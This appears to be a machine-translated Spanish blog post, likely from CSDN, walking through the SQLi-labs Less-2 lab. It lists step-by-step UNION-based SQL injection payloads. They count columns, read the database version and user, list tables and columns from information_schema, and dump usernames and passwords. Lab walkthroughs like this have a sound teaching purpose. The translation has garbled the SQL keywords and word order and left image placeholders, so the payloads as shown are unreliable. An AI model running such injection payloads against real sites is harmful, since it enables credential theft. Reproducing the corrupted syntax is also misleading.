SQLi-labs Menos-2

La GET-2 Menos - Error basa - basado Intiger
1. página original Aquí Insertar imagen Descripción
2.?id=1 Aquí Insertar imagen Descripción
3.?id=1 ' Aquí Insertar imagen Descripción
' 'LIMIT 0,1' -> '' LIMIT 0,1 '->' LIMIT 0 1 -> ya que estamos entrada id = 1 'es de entrada = 1' se puede determinar como Límite de entrada 0,1

SQL: Seleccionar login_name, contraseña de administrador donde id = entrada del límite de 0,1

4. campo de consulta
? ID = Orden. 1 por 4- + Aquí Insertar imagen Descripción
? = ID +. 1 Ordenar por 3- Aquí Insertar imagen Descripción
no se está dando a encontrar el número más grande, la tabla puede ser de longitud de campo determinada es 3

5. punto de consulta de eco
? Id = 0 SELECT 1,2,3-Unión + Aquí Insertar imagen Descripción
6. La consulta la información de versión de base de datos
? Id = 0 SELECT Unión. 1, Versión (), 3- +
Aquí Insertar imagen Descripción
7. La consulta la base de datos y el usuario
? Id = 0 union select 1, la base de datos (), usuario () - +
Aquí Insertar imagen Descripción
esa base de datos de seguridad de nombre

8. búsqueda de nombre mesa
? Id = 0 union select 1, (seleccione GROUP_CONCAT (nombre_tabla) desde donde INFORMATION_SCHEMA.TABLES esquema_tabla = 'seguridad'), 3- + Aquí Insertar imagen Descripción
get toda la seguridad de los nombres de las tablas de base de datos, que damos a los usuarios

9. nombres de las columnas de la consulta
? Id = 0 union select 1, (seleccione GROUP_CONCAT (nombre_columna) de INFORMATION_SCHEMA.COLUMNS donde esquema_tabla = 'seguridad' y nombre_tabla = 'usuarios'), 3- +
Aquí Insertar imagen Descripción
para dar todos los nombres de las columnas de la tabla usuarios, tener nombre de usuario , contraseña

10. consultas de nombre de usuario y contraseña
Id = 0 union select 1,? GROUP_CONCAT (nombre de usuario, 0x3a, password), 3 de usuarios- +
Nota: 0x3A '': el valor hexadecimal del carácter
Aquí Insertar imagen Descripción

Publicado 15 artículos originales · ganado elogios 2 · Vistas 303

Supongo que te gusta

Origin blog.csdn.net/qq_42630215/article/details/104656118
Recomendado
Clasificación